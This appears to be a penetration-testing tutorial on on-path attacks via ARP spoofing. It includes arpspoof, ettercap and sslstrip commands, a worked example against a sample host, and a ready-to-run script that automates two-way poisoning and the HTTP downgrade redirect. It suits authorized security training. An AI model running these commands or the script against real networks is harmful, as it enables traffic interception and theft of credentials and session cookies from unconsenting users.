On-Path / Man in the Middle Attacks
On-Path Attack (Man-in-the-Middle Attack)
Definition: An On-Path Attack, also known as a Man-in-the-Middle (MitM) attack, involves an attacker secretly intercepting and potentially altering the communication between two parties who believe they are directly communicating with each other. The attacker can eavesdrop, capture sensitive data, or inject malicious content into the communication stream. On a local network the usual way to get on-path is ARP spoofing, which is what the rest of this page covers.
Conducting an On-Path Attack
Steps to Conduct an On-Path Attack
Network Discovery:
Identify potential targets and gather information about the network.
Tools: Nmap, Netdiscover
ARP Spoofing/Poisoning:
Send forged ARP replies so that the target maps the gateway's IP address to the attacker's MAC address and the gateway maps the target's IP address to the attacker's MAC address. Traffic between the two then passes through the attacker's machine, which must forward it for the connection to keep working.
Tools: arpspoof, ettercap, bettercap
Traffic Interception and Analysis:
Capture and analyze the intercepted traffic.
Tools: Wireshark, tcpdump
Traffic Manipulation:
Modify the intercepted traffic to inject malicious content or alter data.
Tools: mitmproxy, ettercap
Session Hijacking or Data Extraction:
Extract sensitive data such as login credentials, session cookies, or hijack active sessions.
Tools: sslstrip, Wireshark
Tools and Techniques
1. ARP Spoofing with arpspoof
Installation:
sudo apt-get install dsniff
Usage:
# Enable IP forwarding so the victim's traffic is relayed instead of dropped.
# Note: "sudo echo 1 > /proc/sys/net/ipv4/ip_forward" fails with "Permission denied",
# because the redirection is done by the unprivileged shell, not by sudo.
sudo sysctl -w net.ipv4.ip_forward=1
# Poison both sides: tell the target that the attacker is the gateway, and the gateway that the attacker is the target
sudo arpspoof -i <interface> -t <target_ip> <gateway_ip>
sudo arpspoof -i <interface> -t <gateway_ip> <target_ip>
# Stop with Ctrl-C: arpspoof then re-ARPs both hosts with the correct MAC addresses
2. ARP Spoofing with ettercap
Installation:
sudo apt-get install ettercap-text-only
Usage:
# ettercap-text-only has no GUI, so -G will not work here; use text mode (-T) with the ARP poisoning module (-M arp:remote)
# Targets are written MAC/IP/PORT; an empty field matches anything
sudo ettercap -T -q -i <interface> -M arp:remote /<target_ip>// /<gateway_ip>//
# arp:remote poisons both the target and the gateway, so traffic in both directions passes through the attacker
# Press q to stop; ettercap re-announces the original ARP entries on exit
3. Traffic Analysis with Wireshark
Installation:
sudo apt-get install wireshark
Usage:
# Launch Wireshark and start capturing on the interface used for the attack (display filters such as "arp" or "http" narrow the view)
sudo wireshark
# Running the GUI as root is discouraged; on Debian/Kali add yourself to the wireshark group instead
# (sudo usermod -aG wireshark $USER, then log in again), which lets the dumpcap helper capture without root
# Alternatively capture headlessly and open the file in Wireshark later:
sudo tcpdump -i <interface> -w capture.pcap
4. SSL Stripping with sslstrip
Installation:
sudo apt-get install sslstrip
Usage:
# Listen for redirected HTTP and rewrite https:// links to http:// (add -w <file> to log captured data)
sudo sslstrip -l 8080
# Send the victim's port-80 traffic arriving on the attack interface to sslstrip
sudo iptables -t nat -A PREROUTING -i <interface> -p tcp --dport 80 -j REDIRECT --to-port 8080
# Caveat: sslstrip only works for sites the browser is willing to load over plain HTTP. HSTS (and the HSTS
# preload list built into browsers) makes the browser refuse http:// for such sites, so the downgrade never happens.
# sslstrip is also unmaintained and depends on Python 2, so the package may be missing from current repositories.
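Before setting up sslstrip it is worth checking whether the target site can be downgraded at all. The script below is an added example, not code from this page or from the sslstrip project: it reads HTTP response headers on stdin (for instance from `curl -sI https://host/`), reports whether Strict-Transport-Security is set and for how long, and returns non-zero when a returning browser will refuse plain HTTP. It assumes only curl, awk and sed; the header samples in the usage note are constructed.

```shell
#!/usr/bin/env bash
# hsts-check.sh: will a browser that has seen this site accept an http:// downgrade?
# Added example, not from the original page. Assumes curl, awk and sed.
set -eu

# Read raw HTTP response headers on stdin (as printed by `curl -sI`), print the value of
# the first Strict-Transport-Security header, and return 1 when the header is absent.
hsts_header() {
  tr -d '\r' | awk '
    tolower($0) ~ /^strict-transport-security:/ && !found {
      sub(/^[^:]*:[ \t]*/, ""); print; found = 1
    }
    END { exit found ? 0 : 1 }'
}

# Print the max-age (seconds) from a policy string, or 0 when it has none.
hsts_max_age() {
  printf '%s\n' "$1" | tr 'A-Z' 'a-z' \
    | sed -n 's/.*max-age=\([0-9][0-9]*\).*/\1/p' | head -n1 | grep . || echo 0
}

# Verdict for the headers on stdin. Returns 0 when an sslstrip-style downgrade can work
# (no usable HSTS policy) and 1 when returning browsers will refuse plain HTTP.
downgrade_feasible() {
  policy=$(hsts_header) || { echo "no HSTS header: downgrade feasible on the first http:// request"; return 0; }
  age=$(hsts_max_age "$policy")
  if [ "$age" -eq 0 ]; then
    echo "HSTS max-age=0: policy is being cleared, downgrade feasible"; return 0
  fi
  # The preload directive only signals intent to be on the browser preload list.
  case "$(printf '%s' "$policy" | tr 'A-Z' 'a-z')" in
    *preload*) extra=" and the site may be on the browser preload list" ;;
    *) extra="" ;;
  esac
  echo "HSTS: $policy (browsers keep HTTPS for ${age}s$extra): sslstrip will not see this site"
  return 1
}

# Live check of one host. HSTS is only honoured when received over TLS, so ask over https.
check_host() {
  curl -sSI --max-time 10 "https://$1/" | downgrade_feasible
}

# Only run the live check when invoked with a hostname; sourcing the file just defines the functions.
if [ "$#" -eq 1 ]; then check_host "$1"; fi
```

Usage: `./hsts-check.sh example.com`, or feed saved headers with `printf 'HTTP/1.1 200 OK\r\nStrict-Transport-Security: max-age=31536000\r\n\r\n' | downgrade_feasible` after sourcing the file. A site without the header is only downgradable on its first plain-HTTP request; once a browser has seen the policy over HTTPS it stays pinned for max-age seconds, which is why the check is made over https.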
Example Workflow
Network Discovery:
nmap -sn 192.168.1.0/24
ARP Spoofing (victim 192.168.1.10, gateway 192.168.1.1; run each arpspoof in its own terminal):
sudo sysctl -w net.ipv4.ip_forward=1
sudo arpspoof -i eth0 -t 192.168.1.10 192.168.1.1
sudo arpspoof -i eth0 -t 192.168.1.1 192.168.1.10
Traffic Analysis:
sudo wireshark
SSL Stripping:
sudo sslstrip -l 8080
sudo iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080
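The steps above (IP forwarding, the NAT redirect to the interception proxy, and ARP poisoning in both directions) leave the victim cut off if the attacker's machine exits without undoing them. The script below collects the workflow into one file that restores the previous state on Ctrl-C or on error. It is an added example, not code from this page or from the dsniff project: it assumes Linux with iptables and dsniff's arpspoof installed, that it runs as root, and that the interception proxy listens on port 8080 as in the sslstrip step. The IPv4 check, the saved sysctl value and the trap-based cleanup are additions to the page's commands.

```shell
#!/usr/bin/env bash
# onpath-lab.sh: run the ARP-poisoning workflow from this page and undo it on exit.
# Added example (not from the original page). Assumes Linux, root, iptables and dsniff's arpspoof.
# Usage: sudo ./onpath-lab.sh <interface> <target_ip> <gateway_ip>
set -eu

PROXY_PORT=8080   # where sslstrip/mitmproxy listens (assumption; matches the sslstrip step)

# Return 0 only for a dotted-quad IPv4 address with every octet in 0..255.
is_ipv4() {
  case "$1" in
    ''|*[!0-9.]*|.*|*.|*..*) return 1 ;;
  esac
  saved_ifs=$IFS; IFS=.; set -- $1; IFS=$saved_ifs
  [ "$#" -eq 4 ] || return 1
  for octet in "$@"; do
    [ "$octet" -le 255 ] || return 1
  done
  return 0
}

# Restore everything setup changed. Runs from the trap on Ctrl-C or on any error.
cleanup() {
  trap - EXIT INT TERM
  # SIGTERM makes arpspoof send corrective ARP replies before it exits.
  [ -n "$pid_a" ] && kill "$pid_a" 2>/dev/null || true
  [ -n "$pid_b" ] && kill "$pid_b" 2>/dev/null || true
  wait 2>/dev/null || true
  iptables -t nat -D PREROUTING -i "$iface" -p tcp --dport 80 -j REDIRECT --to-port "$PROXY_PORT" 2>/dev/null || true
  sysctl -q -w net.ipv4.ip_forward="$saved_forward"
  echo "restored: ip_forward=$saved_forward, NAT rule removed, ARP entries re-announced" >&2
}

setup() {
  # "sudo echo 1 > /proc/sys/..." fails because the redirect runs in the unprivileged shell; use sysctl.
  saved_forward=$(sysctl -n net.ipv4.ip_forward)
  sysctl -q -w net.ipv4.ip_forward=1
  # Only plaintext HTTP arriving on the attack interface is sent to the proxy.
  iptables -t nat -A PREROUTING -i "$iface" -p tcp --dport 80 -j REDIRECT --to-port "$PROXY_PORT"
  # Poison both directions so replies from the gateway also pass through this host.
  arpspoof -i "$iface" -t "$target" "$gateway" >/dev/null 2>&1 & pid_a=$!
  arpspoof -i "$iface" -t "$gateway" "$target" >/dev/null 2>&1 & pid_b=$!
}

main() {
  iface=$1; target=$2; gateway=$3
  pid_a=''; pid_b=''; saved_forward=0
  [ "$(id -u)" -eq 0 ] || { echo "run as root" >&2; return 1; }
  is_ipv4 "$target" && is_ipv4 "$gateway" || { echo "target and gateway must be IPv4 addresses" >&2; return 1; }
  trap cleanup EXIT INT TERM
  setup
  echo "poisoning $target <-> $gateway on $iface; capture with: tcpdump -i $iface -w lab.pcap" >&2
  echo "Ctrl-C stops the attack and restores the network" >&2
  wait "$pid_a"
}

# Only run when invoked with the three arguments; sourcing the file just defines the functions.
if [ "$#" -eq 3 ]; then main "$@"; fi
```

Background jobs started by a non-interactive shell ignore the terminal's SIGINT, so Ctrl-C reaches the script but not the two arpspoof processes; the cleanup trap terminates them explicitly, which is what triggers arpspoof's own re-ARP of the victim and gateway. Start sslstrip or mitmproxy on port 8080 in another terminal before running the script.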
Ethical Considerations
Authorization: Always obtain explicit permission from network owners before performing any MitM attacks.
Controlled Environment: Conduct these tests in a controlled and isolated environment to prevent unintentional harm.
Data Protection: Ensure that any intercepted data is handled securely and ethically, with no unauthorized access or disclosure.
By following this guide responsibly, you can simulate On-Path Attacks to assess the security posture of networks and identify potential vulnerabilities, helping to strengthen overall security.